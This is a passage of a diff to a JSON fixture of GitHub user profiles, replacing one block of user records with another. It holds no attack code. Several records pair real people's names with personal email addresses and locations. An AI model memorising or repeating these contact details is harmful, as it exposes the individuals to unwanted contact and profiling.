"node_id": "MDQ6VXNlcjgyMjE4NzA1", + "public_repositories_count": 13, + "created_at": "2013-02-13T12:17:54Z", + "updated_at": "2022-04-21T00:56:24Z", + "node_id": "MDQ6VXNlcjM1ODM5NjA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8418, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.993Z", + "nest_updated_at": "2024-09-22T20:24:06.658Z", + "name": "Pei Hsuan Hung ", + "login": "afcidk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21095621?v=4", + "company": "", + "location": "Taiwan", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 26, + "public_gists_count": 6, + "public_repositories_count": 59, + "created_at": "2016-08-18T04:30:27Z", + "updated_at": "2024-04-24T05:11:28Z", + "node_id": "MDQ6VXNlcjIxMDk1NjIx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436153,74 +696377,99 @@ }, { "model": "github.user", - "pk": 3037, + "pk": 8419, "fields": { - "nest_created_at": "2024-09-12T03:12:04.380Z", - "nest_updated_at": "2024-09-12T03:12:04.380Z", - "name": "Thorsten Sick", - "login": "Thorsten-Sick", - "email": "thorsten.sick@email.de", - "avatar_url": "https://avatars.githubusercontent.com/u/537519?v=4", + "nest_created_at": "2024-09-22T10:38:52.315Z", + "nest_updated_at": "2024-09-22T20:24:06.967Z", + "name": "Adam Szatyin", + "login": "szatyinadam", + "email": "szatyinadam@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13780853?v=4", "company": "", - "location": "", + "location": "Hungary", "collaborators_count": 0, "following_count": 2, - "followers_count": 51, - "public_gists_count": 0, - "public_repositories_count": 57, - "created_at": "2010-12-27T06:59:52Z", - "updated_at": "2023-12-21T13:44:26Z", - "node_id": "MDQ6VXNlcjUzNzUxOQ==", - "bio": "Security engineer, architect, mad scientist, coach and author.\r\n@ThorstenSick", + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2015-08-13T11:24:38Z", + "updated_at": "2024-08-30T20:13:23Z", + "node_id": "MDQ6VXNlcjEzNzgwODUz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3038, + "pk": 8420, "fields": { - "nest_created_at": "2024-09-12T03:12:06.068Z", - "nest_updated_at": "2024-09-12T03:12:06.068Z", - "name": "Raphael Ahrens", - "login": "raphaelahrens", + "nest_created_at": "2024-09-22T10:38:52.633Z", + "nest_updated_at": "2024-09-22T20:24:07.300Z", + "name": "Aswin Shailajan", + "login": "aswin2108", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5632364?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72661784?v=4", + "company": "Vellore Institute of Technology", "location": "", "collaborators_count": 0, - "following_count": 22, - "followers_count": 13, + "following_count": 26, + "followers_count": 20, + "public_gists_count": 1, + "public_repositories_count": 69, + "created_at": "2020-10-10T15:09:37Z", + "updated_at": "2024-05-05T03:37:13Z", + "node_id": "MDQ6VXNlcjcyNjYxNzg0", + "bio": "Final year computer science engineering student • SDE Intern at @OpenGenus • Web Developer • Hacktoberfest22 • 24PullRequest 22 • Technical Writer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8421, + "fields": { + "nest_created_at": "2024-09-22T10:38:52.950Z", + "nest_updated_at": "2024-09-22T20:24:07.609Z", + "name": "caputdraconis", + "login": "caputdraconis050630", + "email": "caputdraconis@kakao.com", + "avatar_url": "https://avatars.githubusercontent.com/u/60993104?v=4", + "company": "INHA Univ. Computer Network LAB", + "location": "Seoul, Korea", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 30, "public_gists_count": 0, - "public_repositories_count": 49, - "created_at": "2013-10-07T20:07:55Z", - "updated_at": "2024-08-08T19:48:09Z", - "node_id": "MDQ6VXNlcjU2MzIzNjQ=", + "public_repositories_count": 53, + "created_at": "2020-02-13T01:00:57Z", + "updated_at": "2024-09-05T12:12:55Z", + "node_id": "MDQ6VXNlcjYwOTkzMTA0", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3039, + "pk": 8422, "fields": { - "nest_created_at": "2024-09-12T03:12:07.704Z", - "nest_updated_at": "2024-09-18T19:13:20.826Z", + "nest_created_at": "2024-09-22T10:38:53.268Z", + "nest_updated_at": "2024-09-22T20:24:07.925Z", "name": "", - "login": "Hummus-Ful", + "login": "donkrasnov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11685796?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42833573?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 13, - "created_at": "2015-03-27T20:09:41Z", - "updated_at": "2024-07-10T13:55:34Z", - "node_id": "MDQ6VXNlcjExNjg1Nzk2", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-08-30T09:16:46Z", + "updated_at": "2024-08-02T07:32:02Z", + "node_id": "MDQ6VXNlcjQyODMzNTcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436228,24 +696477,24 @@ }, { "model": "github.user", - "pk": 3040, + "pk": 8423, "fields": { - "nest_created_at": "2024-09-12T03:12:13.625Z", - "nest_updated_at": "2024-09-18T19:13:22.648Z", + "nest_created_at": "2024-09-22T10:38:53.577Z", + "nest_updated_at": "2024-09-22T20:24:08.244Z", "name": "", - "login": "devsecopsmaturitymodel", + "login": "ephemeralwaves", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/146089092?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1075530?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2023-09-26T11:31:25Z", - "updated_at": "2023-11-06T10:30:14Z", - "node_id": "O_kgDOCLUkhA", + "following_count": 15, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2011-09-24T02:09:22Z", + "updated_at": "2024-09-22T19:06:19Z", + "node_id": "MDQ6VXNlcjEwNzU1MzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436253,124 +696502,124 @@ }, { "model": "github.user", - "pk": 3041, + "pk": 8424, "fields": { - "nest_created_at": "2024-09-12T03:12:17.207Z", - "nest_updated_at": "2024-09-18T19:13:25.768Z", - "name": "Aryan", - "login": "0x41head", + "nest_created_at": "2024-09-22T10:38:53.889Z", + "nest_updated_at": "2024-09-22T20:24:08.564Z", + "name": "juoum", + "login": "itsjuoum", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53595853?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79800410?v=4", + "company": "FalixNodes", "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 8, + "following_count": 18, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 46, - "created_at": "2019-08-02T06:13:54Z", - "updated_at": "2024-09-13T11:29:34Z", - "node_id": "MDQ6VXNlcjUzNTk1ODUz", + "public_repositories_count": 5, + "created_at": "2021-02-28T15:47:14Z", + "updated_at": "2024-09-14T16:34:11Z", + "node_id": "MDQ6VXNlcjc5ODAwNDEw", "bio": "", "is_hireable": false, - "twitter_username": "0x41head" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3042, + "pk": 8425, "fields": { - "nest_created_at": "2024-09-12T03:12:18.082Z", - "nest_updated_at": "2024-09-18T00:24:30.896Z", - "name": "", - "login": "enzowritescode", + "nest_created_at": "2024-09-22T10:38:54.199Z", + "nest_updated_at": "2024-09-22T20:24:08.882Z", + "name": "Ashish Malik", + "login": "malikashish8", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1328683?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4948888?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2012-01-13T20:08:33Z", - "updated_at": "2024-08-06T17:59:38Z", - "node_id": "MDQ6VXNlcjEzMjg2ODM=", - "bio": "", + "following_count": 1, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2013-07-05T14:35:41Z", + "updated_at": "2024-09-08T06:45:48Z", + "node_id": "MDQ6VXNlcjQ5NDg4ODg=", + "bio": "Security Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3043, + "pk": 8426, "fields": { - "nest_created_at": "2024-09-12T03:12:53.545Z", - "nest_updated_at": "2024-09-18T19:14:05.500Z", - "name": "OWASP Amass Project", - "login": "owasp-amass", + "nest_created_at": "2024-09-22T10:38:54.825Z", + "nest_updated_at": "2024-09-22T20:24:09.519Z", + "name": "", + "login": "pjhggns", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/128647419?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2665487?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 346, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2023-03-22T21:57:39Z", - "updated_at": "2024-09-01T11:32:49Z", - "node_id": "O_kgDOB6sA-w", - "bio": "In-depth Attack Surface Mapping and Asset Discovery", + "public_repositories_count": 2, + "created_at": "2012-10-27T20:22:36Z", + "updated_at": "2018-02-14T15:06:45Z", + "node_id": "MDQ6VXNlcjI2NjU0ODc=", + "bio": "", "is_hireable": false, - "twitter_username": "owaspamass" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3044, + "pk": 8427, "fields": { - "nest_created_at": "2024-09-12T03:13:02.026Z", - "nest_updated_at": "2024-09-12T03:15:47.052Z", - "name": "Jeff Foley", - "login": "caffix", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7319658?v=4", - "company": "@OWASP and @zerofox-oss", - "location": "New York, United States", + "nest_created_at": "2024-09-22T10:38:55.145Z", + "nest_updated_at": "2024-09-22T20:24:09.831Z", + "name": "Slav Pilus", + "login": "slav-pilus", + "email": "slav.pilus@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1456751?v=4", + "company": "", + "location": "London, UK", "collaborators_count": 0, - "following_count": 121, - "followers_count": 1361, - "public_gists_count": 1, - "public_repositories_count": 25, - "created_at": "2014-04-16T21:00:57Z", - "updated_at": "2024-09-06T11:29:32Z", - "node_id": "MDQ6VXNlcjczMTk2NTg=", - "bio": "Project Leader of @OWASP Amass and VP of Research at @zerofox-oss ", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2012-02-21T09:46:49Z", + "updated_at": "2024-08-31T07:24:21Z", + "node_id": "MDQ6VXNlcjE0NTY3NTE=", + "bio": "", "is_hireable": false, - "twitter_username": "jeff_foley" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3045, + "pk": 8428, "fields": { - "nest_created_at": "2024-09-12T03:13:04.585Z", - "nest_updated_at": "2024-09-12T03:13:14.772Z", - "name": "Nikos Gk", - "login": "ngkogkos", + "nest_created_at": "2024-09-22T10:38:55.495Z", + "nest_updated_at": "2024-09-22T20:24:10.148Z", + "name": "", + "login": "strollingHeifer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1519209?v=4", - "company": "None", - "location": "Greece", + "avatar_url": "https://avatars.githubusercontent.com/u/26030936?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 14, - "followers_count": 59, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2012-03-09T08:01:32Z", - "updated_at": "2024-06-01T18:07:17Z", - "node_id": "MDQ6VXNlcjE1MTkyMDk=", + "public_repositories_count": 4, + "created_at": "2017-02-25T20:34:53Z", + "updated_at": "2024-08-25T11:34:21Z", + "node_id": "MDQ6VXNlcjI2MDMwOTM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436378,49 +696627,49 @@ }, { "model": "github.user", - "pk": 3046, + "pk": 8429, "fields": { - "nest_created_at": "2024-09-12T03:13:05.397Z", - "nest_updated_at": "2024-09-12T03:13:05.397Z", + "nest_created_at": "2024-09-22T10:38:55.816Z", + "nest_updated_at": "2024-09-22T20:24:10.456Z", "name": "", - "login": "aomdev1", + "login": "test2user-aqil", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54966082?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/92258859?v=4", "company": "", - "location": "", + "location": "the same", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-09-06T00:26:48Z", - "updated_at": "2019-09-06T00:26:48Z", - "node_id": "MDQ6VXNlcjU0OTY2MDgy", + "public_repositories_count": 21, + "created_at": "2021-10-10T13:18:26Z", + "updated_at": "2023-08-28T12:54:52Z", + "node_id": "U_kgDOBX_CKw", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "usr0x41" } }, { "model": "github.user", - "pk": 3047, + "pk": 8430, "fields": { - "nest_created_at": "2024-09-12T03:13:07.931Z", - "nest_updated_at": "2024-09-12T03:13:07.931Z", + "nest_created_at": "2024-09-22T10:38:56.132Z", + "nest_updated_at": "2024-09-22T20:24:10.781Z", "name": "", - "login": "nullenc0de", + "login": "nxadm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30237867?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3687879?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 186, - "public_gists_count": 47, - "public_repositories_count": 24, - "created_at": "2017-07-17T14:44:58Z", - "updated_at": "2024-01-31T21:18:58Z", - "node_id": "MDQ6VXNlcjMwMjM3ODY3", + "following_count": 30, + "followers_count": 36, + "public_gists_count": 10, + "public_repositories_count": 57, + "created_at": "2013-02-24T20:48:44Z", + "updated_at": "2024-09-03T11:25:45Z", + "node_id": "MDQ6VXNlcjM2ODc4Nzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436428,24 +696677,24 @@ }, { "model": "github.user", - "pk": 3048, + "pk": 8431, "fields": { - "nest_created_at": "2024-09-12T03:13:08.889Z", - "nest_updated_at": "2024-09-12T03:13:08.889Z", - "name": "Flightkick", - "login": "Flightkick", + "nest_created_at": "2024-09-22T10:38:56.772Z", + "nest_updated_at": "2024-09-22T20:24:11.408Z", + "name": "Agustín Díaz", + "login": "AgustinRamiroDiaz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8693699?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49416765?v=4", "company": "", - "location": "The Netherlands", + "location": "Rosario, Argentina", "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, + "following_count": 41, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2014-09-08T08:53:57Z", - "updated_at": "2024-05-06T09:01:54Z", - "node_id": "MDQ6VXNlcjg2OTM2OTk=", + "public_repositories_count": 97, + "created_at": "2019-04-08T21:12:45Z", + "updated_at": "2024-08-28T21:10:18Z", + "node_id": "MDQ6VXNlcjQ5NDE2NzY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436453,49 +696702,49 @@ }, { "model": "github.user", - "pk": 3049, + "pk": 8432, "fields": { - "nest_created_at": "2024-09-12T03:13:10.576Z", - "nest_updated_at": "2024-09-12T03:13:10.577Z", - "name": "", - "login": "myst404", + "nest_created_at": "2024-09-22T10:38:57.395Z", + "nest_updated_at": "2024-09-22T20:24:12.051Z", + "name": "Atharva Vaidya", + "login": "atharvanvaidya", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12991725?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25866649?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 26, + "following_count": 32, + "followers_count": 15, "public_gists_count": 7, - "public_repositories_count": 8, - "created_at": "2015-06-21T21:09:36Z", - "updated_at": "2023-11-13T12:32:58Z", - "node_id": "MDQ6VXNlcjEyOTkxNzI1", - "bio": "", + "public_repositories_count": 64, + "created_at": "2017-02-18T15:24:09Z", + "updated_at": "2024-08-08T04:12:25Z", + "node_id": "MDQ6VXNlcjI1ODY2NjQ5", + "bio": "Just another Python Enthusiast.\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3050, + "pk": 8433, "fields": { - "nest_created_at": "2024-09-12T03:13:11.418Z", - "nest_updated_at": "2024-09-12T03:13:11.418Z", - "name": "Stojan", - "login": "GitGitNS", + "nest_created_at": "2024-09-22T10:38:58.022Z", + "nest_updated_at": "2024-09-22T20:24:12.694Z", + "name": "Bartosz Bogatko", + "login": "XyrusQ", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16868806?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29212281?v=4", "company": "", - "location": "", + "location": "Poland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-01-24T20:59:30Z", - "updated_at": "2020-06-17T19:19:25Z", - "node_id": "MDQ6VXNlcjE2ODY4ODA2", + "public_repositories_count": 3, + "created_at": "2017-06-05T20:20:40Z", + "updated_at": "2021-04-09T21:19:59Z", + "node_id": "MDQ6VXNlcjI5MjEyMjgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436503,199 +696752,224 @@ }, { "model": "github.user", - "pk": 3051, + "pk": 8434, "fields": { - "nest_created_at": "2024-09-12T03:13:13.937Z", - "nest_updated_at": "2024-09-12T03:13:13.937Z", - "name": "Daehee", - "login": "daehee", + "nest_created_at": "2024-09-22T10:38:58.334Z", + "nest_updated_at": "2024-09-22T20:24:13.005Z", + "name": "Charles Truluck", + "login": "charlestruluck", + "email": "github@ctruluck.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8528039?v=4", + "company": "Charles Truluck LLC", + "location": "Charleston, SC", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 21, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2014-08-23T01:17:00Z", + "updated_at": "2024-08-20T14:58:32Z", + "node_id": "MDQ6VXNlcjg1MjgwMzk=", + "bio": "WWDC '16, '17, and '19 Scholar. Hosted PGCTF '17, '18 and '19.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8435, + "fields": { + "nest_created_at": "2024-09-22T10:38:58.686Z", + "nest_updated_at": "2024-09-22T20:24:13.378Z", + "name": "", + "login": "CJHackerz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81271?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10861307?v=4", "company": "", - "location": "Phoenix, AZ", + "location": "/dev/null", "collaborators_count": 0, - "following_count": 176, - "followers_count": 91, - "public_gists_count": 19, - "public_repositories_count": 33, - "created_at": "2009-05-05T16:28:37Z", - "updated_at": "2024-08-11T02:13:57Z", - "node_id": "MDQ6VXNlcjgxMjcx", + "following_count": 26, + "followers_count": 60, + "public_gists_count": 12, + "public_repositories_count": 45, + "created_at": "2015-02-05T06:28:37Z", + "updated_at": "2024-09-13T04:46:08Z", + "node_id": "MDQ6VXNlcjEwODYxMzA3", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "cjhackerz" } }, { "model": "github.user", - "pk": 3052, + "pk": 8436, "fields": { - "nest_created_at": "2024-09-12T03:13:15.584Z", - "nest_updated_at": "2024-09-12T03:13:15.584Z", - "name": "Avi", - "login": "Avileox", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40210313?v=4", + "nest_created_at": "2024-09-22T10:38:59.012Z", + "nest_updated_at": "2024-09-22T20:24:13.688Z", + "name": "Hyeongjin Choi", + "login": "r4k0nb4k0n", + "email": "chj6097@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5409746?v=4", "company": "", - "location": "", + "location": "Seoul, Republic of Korea", "collaborators_count": 0, - "following_count": 83, - "followers_count": 67, - "public_gists_count": 7, - "public_repositories_count": 2, - "created_at": "2018-06-12T15:53:50Z", - "updated_at": "2024-07-08T05:45:46Z", - "node_id": "MDQ6VXNlcjQwMjEwMzEz", - "bio": "Application Security Enthusiast", + "following_count": 82, + "followers_count": 50, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2013-09-08T03:35:17Z", + "updated_at": "2024-08-20T03:45:30Z", + "node_id": "MDQ6VXNlcjU0MDk3NDY=", + "bio": "Test harder, Write better, Fail faster and Make the code stronger.", "is_hireable": false, - "twitter_username": "avileox" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3053, + "pk": 8437, "fields": { - "nest_created_at": "2024-09-12T03:13:17.234Z", - "nest_updated_at": "2024-09-12T03:13:17.234Z", - "name": "Dan Gardner", - "login": "dan-processbolt", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45269444?v=4", - "company": "@ProcessBolt, Inc.", - "location": "Minneapolis, MN", + "nest_created_at": "2024-09-22T10:38:59.331Z", + "nest_updated_at": "2024-09-22T20:24:14.000Z", + "name": "Dan Muller", + "login": "dwmuller", + "email": "dan.muller@dmuller.us", + "avatar_url": "https://avatars.githubusercontent.com/u/17508429?v=4", + "company": "", + "location": "Manchester, MI, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-11-22T17:07:20Z", - "updated_at": "2023-10-27T19:20:09Z", - "node_id": "MDQ6VXNlcjQ1MjY5NDQ0", - "bio": "", + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2016-02-27T04:51:28Z", + "updated_at": "2024-03-25T21:03:43Z", + "node_id": "MDQ6VXNlcjE3NTA4NDI5", + "bio": "Telling computers what to do since 1982.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3054, + "pk": 8438, "fields": { - "nest_created_at": "2024-09-12T03:13:18.060Z", - "nest_updated_at": "2024-09-12T03:13:46.315Z", - "name": "", - "login": "CravateRouge", - "email": "baptiste@cravaterouge.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16681900?v=4", - "company": "CravateRouge Ltd", - "location": "", + "nest_created_at": "2024-09-22T10:38:59.703Z", + "nest_updated_at": "2024-09-22T20:24:14.312Z", + "name": "Dilshan Rajapakse", + "login": "dilshanraja", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6647626?v=4", + "company": "", + "location": "Sydney, Australia", "collaborators_count": 0, - "following_count": 3, - "followers_count": 145, - "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2016-01-13T09:04:05Z", - "updated_at": "2024-07-02T17:39:59Z", - "node_id": "MDQ6VXNlcjE2NjgxOTAw", - "bio": "Need a hand with your information system security? Send me an email.", - "is_hireable": true, - "twitter_username": "rouge_cravate" + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-02-11T07:32:33Z", + "updated_at": "2024-08-06T08:59:51Z", + "node_id": "MDQ6VXNlcjY2NDc2MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3055, + "pk": 8439, "fields": { - "nest_created_at": "2024-09-12T03:13:18.869Z", - "nest_updated_at": "2024-09-12T03:13:18.869Z", - "name": "0x73746F66", - "login": "chrisdlangton", + "nest_created_at": "2024-09-22T10:39:00.018Z", + "nest_updated_at": "2024-09-22T20:30:37.500Z", + "name": "Eskil Andréen", + "login": "eskilandreen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3494633?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/713475?v=4", "company": "", - "location": "", + "location": "Stockholm, Sweden", "collaborators_count": 0, - "following_count": 5, - "followers_count": 56, - "public_gists_count": 52, - "public_repositories_count": 3, - "created_at": "2013-02-06T19:09:41Z", - "updated_at": "2024-09-05T05:23:29Z", - "node_id": "MDQ6VXNlcjM0OTQ2MzM=", + "following_count": 3, + "followers_count": 11, + "public_gists_count": 4, + "public_repositories_count": 11, + "created_at": "2011-04-06T16:31:48Z", + "updated_at": "2024-09-11T15:32:23Z", + "node_id": "MDQ6VXNlcjcxMzQ3NQ==", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3056, + "pk": 8440, "fields": { - "nest_created_at": "2024-09-12T03:13:19.676Z", - "nest_updated_at": "2024-09-12T03:13:19.676Z", - "name": "Ryan", - "login": "rjenningsuk", + "nest_created_at": "2024-09-22T10:39:00.330Z", + "nest_updated_at": "2024-09-22T20:24:14.979Z", + "name": "Jacob Skiba", + "login": "jskiba99", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17529217?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5489831?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-02-28T14:49:58Z", - "updated_at": "2024-05-19T19:14:23Z", - "node_id": "MDQ6VXNlcjE3NTI5MjE3", - "bio": "Contract Full-Stack PHP Developer\r\nLaravel & Symfony", + "public_repositories_count": 20, + "created_at": "2013-09-18T20:41:49Z", + "updated_at": "2024-03-12T01:17:26Z", + "node_id": "MDQ6VXNlcjU0ODk4MzE=", + "bio": "", "is_hireable": false, - "twitter_username": "ryanjuk" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3057, + "pk": 8441, "fields": { - "nest_created_at": "2024-09-12T03:13:20.481Z", - "nest_updated_at": "2024-09-12T03:13:20.481Z", - "name": "ipk1", - "login": "ipk1", + "nest_created_at": "2024-09-22T10:39:00.669Z", + "nest_updated_at": "2024-09-22T20:24:15.288Z", + "name": "Jason Hilton", + "login": "jascase901", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32953048?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/918633?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 33, - "followers_count": 14, - "public_gists_count": 8, - "public_repositories_count": 319, - "created_at": "2017-10-20T08:08:39Z", - "updated_at": "2024-08-30T15:09:46Z", - "node_id": "MDQ6VXNlcjMyOTUzMDQ4", - "bio": "1Kadaba", + "following_count": 11, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2011-07-15T22:05:27Z", + "updated_at": "2024-09-12T17:14:22Z", + "node_id": "MDQ6VXNlcjkxODYzMw==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3058, + "pk": 8442, "fields": { - "nest_created_at": "2024-09-12T03:13:21.327Z", - "nest_updated_at": "2024-09-12T03:14:32.610Z", + "nest_created_at": "2024-09-22T10:39:01.038Z", + "nest_updated_at": "2024-09-22T20:24:15.610Z", "name": "", - "login": "c3101", + "login": "JeffreyWagnerBHN", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1291019?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/46536425?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2011-12-28T18:59:57Z", - "updated_at": "2024-08-22T12:45:38Z", - "node_id": "MDQ6VXNlcjEyOTEwMTk=", + "public_repositories_count": 1, + "created_at": "2019-01-09T17:36:10Z", + "updated_at": "2020-01-15T00:44:53Z", + "node_id": "MDQ6VXNlcjQ2NTM2NDI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436703,24 +696977,49 @@ }, { "model": "github.user", - "pk": 3059, + "pk": 8443, "fields": { - "nest_created_at": "2024-09-12T03:13:22.175Z", - "nest_updated_at": "2024-09-12T03:13:22.175Z", - "name": "$nyx", - "login": "Arteneko", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23583792?v=4", + "nest_created_at": "2024-09-22T10:39:01.366Z", + "nest_updated_at": "2024-09-22T20:24:15.953Z", + "name": "Jelle Besseling", + "login": "pingiun", + "email": "jelle@pingiun.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1576660?v=4", "company": "", - "location": "", + "location": "Nijmegen, Netherlands", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 47, + "public_gists_count": 24, + "public_repositories_count": 156, + "created_at": "2012-03-26T15:18:41Z", + "updated_at": "2024-06-26T14:19:03Z", + "node_id": "MDQ6VXNlcjE1NzY2NjA=", + "bio": "Python developer who loves Rust and functional programming.", + "is_hireable": true, + "twitter_username": "pingiun_" + } +}, +{ + "model": "github.user", + "pk": 8444, + "fields": { + "nest_created_at": "2024-09-22T10:39:01.674Z", + "nest_updated_at": "2024-09-22T20:24:16.274Z", + "name": "Jesper Hallborg", + "login": "Hallborg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7092252?v=4", + "company": "@Softhouse", + "location": "Sweden, Karlkrona", "collaborators_count": 0, "following_count": 7, - "followers_count": 57, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2016-11-19T18:08:09Z", - "updated_at": "2023-11-11T14:43:53Z", - "node_id": "MDQ6VXNlcjIzNTgzNzky", + "public_repositories_count": 14, + "created_at": "2014-03-28T13:09:07Z", + "updated_at": "2024-09-10T08:38:45Z", + "node_id": "MDQ6VXNlcjcwOTIyNTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436728,24 +697027,24 @@ }, { "model": "github.user", - "pk": 3060, + "pk": 8445, "fields": { - "nest_created_at": "2024-09-12T03:13:23.028Z", - "nest_updated_at": "2024-09-12T03:14:50.105Z", - "name": "", - "login": "gprime31", + "nest_created_at": 